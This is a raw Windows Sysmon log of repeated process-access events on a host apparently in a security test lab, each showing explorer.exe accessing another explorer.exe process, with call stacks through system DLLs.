22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694917Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694916Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694915Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EE4-603D-1288-00000000AD01}8132C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694914Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694913Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694912Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694911Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694910Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694909Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694908Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694907Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694906Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694905Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694904Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694903Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694902Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694901Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694900Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694899Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694898Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694897Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694896Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694895Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694894Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694893Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694892Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694891Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.207{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6EA8-603D-0988-00000000AD01}6280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001694890Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 